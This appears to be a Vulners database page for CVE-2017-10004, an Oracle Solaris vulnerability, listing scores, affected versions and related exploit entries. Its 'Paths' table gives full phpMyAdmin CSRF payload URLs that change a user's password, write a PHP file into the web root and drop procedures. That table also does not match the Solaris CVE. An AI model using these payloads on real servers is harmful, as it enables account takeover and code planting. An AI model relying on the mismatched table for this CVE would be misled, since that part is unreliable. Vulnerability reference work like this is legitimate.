Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

CVE-2017-10004

🗓️ 08 Aug 2017 15:00:00Reported by oracleType 
cve
 cve🔗 web.nvd.nist.gov👁 72 Views🌐 WEB

Vulnerability in Solaris component of Oracle Sun Systems Suite, allowing high privileged attacker to compromise Solaris. CVSS 3.0 Base Score 6.

Related
Detection
Affected
Refs
Paths
ReporterTitlePublishedViews
Family
0day.today		Linux Kernel - The Huge Dirty Cow Overwriting The Huge Zero Page Exploit
1 Dec 201700:00
zdt
0day.today		glibc ld.so - Memory Leak / Buffer Overflow Vulnerability
14 Dec 201700:00
zdt
0day.today		b2evolution CMS 6.8.10 PHP Code Execution Vulnerability
3 Jan 201800:00
zdt
0day.today		Vanilla < 2.1.5 - Cross-Site Request Forgery Vulnerability
8 Jan 201800:00
zdt
0day.today		Primefaces 5.x - Remote Code Execution Exploit
18 Jan 201800:00
zdt
0day.today		Linux Kernel - The Huge Dirty Cow Overwriting The Huge Zero Page (2) Exploit
20 Mar 201800:00
zdt
0day.today		Vehicle Sales Management System - Multiple Vulnerabilities
20 Mar 201800:00
zdt
0day.today		phpMyAdmin 4.7.x - Cross-Site Request Forgery Vulnerability
29 Aug 201800:00
zdt
Atlassian		Code Injection and Directory Traversal in plexus-utils
25 Jan 202104:06
atlassian
CNVD		Oracle Solaris Remote Vulnerability (CNVD-2017-24337)
27 Jul 201700:00
cnvd
Rows per page
NVD
Node
oraclesolarisMatch10
OR
oraclesolarisMatch11
[
  {
    "product": "Solaris Operating System",
    "vendor": "Oracle Corporation",
    "versions": [
      {
        "status": "affected",
        "version": "10"
      },
      {
        "status": "affected",
        "version": "11"
      }
    ]
  }
]
ParameterPositionPathDescriptionCWE
sql_queryquery param7f366ec1afc5832757a402b5355132d0.vsplate.me/sql.php?db=mysql&table=user&sql_query=SET%20password%20=%20PASSWORD(%27www.vulnspy.com%27)CSRF-like exploitation via crafted SQL in phpMyAdmin to change the current user's password.
dbquery param7f366ec1afc5832757a402b5355132d0.vsplate.me/sql.php?db=mysql&table=user&sql_query=SET%20password%20=%20PASSWORD(%27www.vulnspy.com%27)CSRF-like exploitation via crafted SQL in phpMyAdmin to change the current user's password.
tablequery param7f366ec1afc5832757a402b5355132d0.vsplate.me/sql.php?db=mysql&table=user&sql_query=SET%20password%20=%20PASSWORD(%27www.vulnspy.com%27)CSRF-like exploitation via crafted SQL in phpMyAdmin to change the current user's password.
sql_queryquery param7f366ec1afc5832757a402b5355132d0.vsplate.me/sql.php?db=mysql&table=user&sql_query=select%20'%3C%3Fphp+phpinfo()%3B%27%29%20into%20outfile%20'/var/www/html/test.php'%3B"CSRF-like exploitation via crafted SQL in phpMyAdmin to write arbitrary PHP file to the server.
dbquery param7f366ec1afc5832757a402b5355132d0.vsplate.me/sql.php?db=mysql&table=user&sql_query=select%20'%3C%3Fphp+phpinfo()%3B%27%29%20into%20outfile%20'/var/www/html/test.php'%3B"CSRF-like exploitation via crafted SQL in phpMyAdmin to write arbitrary PHP file to the server.
tablequery param7f366ec1afc5832757a402b5355132d0.vsplate.me/sql.php?db=mysql&table=user&sql_query=select%20'%3C%3Fphp+phpinfo()%3B%27%29%20into%20outfile%20'/var/www/html/test.php'%3B"CSRF-like exploitation via crafted SQL in phpMyAdmin to write arbitrary PHP file to the server.
sql_queryquery param7f366ec1afc5832757a402b5355132d0.vsplate.me/import.php?db=mysql&table=user&sql_query=DROP+PROCEDURE+IF+EXISTS+EMPT%3B%0ADELIMITER+%24%24%0ACALL+EMPT%28%29%3B%0ACSRF-like exploitation via crafted SQL in phpMyAdmin to drop and recreate procedures as part of an attack chain.
dbquery param7f366ec1afc5832757a402b5355132d0.vsplate.me/import.php?db=mysql&table=user&sql_query=DROP+PROCEDURE+IF+EXISTS+EMPT%3B%0ADELIMITER+%24%24%0ACALL+EMPT%28%29%3B%0ACSRF-like exploitation via crafted SQL in phpMyAdmin to drop and recreate procedures as part of an attack chain.
tablequery param7f366ec1afc5832757a402b5355132d0.vsplate.me/import.php?db=mysql&table=user&sql_query=DROP+PROCEDURE+IF+EXISTS+EMPT%3B%0ADELIMITER+%24%24%0ACALL+EMPT%28%29%3B%0ACSRF-like exploitation via crafted SQL in phpMyAdmin to drop and recreate procedures as part of an attack chain.

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
13 May 2026 00:24Current
6.2Medium risk
Vulners AI Score6.2
CVSS 36.7
CVSS 27.2
EPSS0.00071
SSVC
cve-2017-10004oraclesun systemssolarisvulnerabilityexploitablecvss 3.0infrastructure
72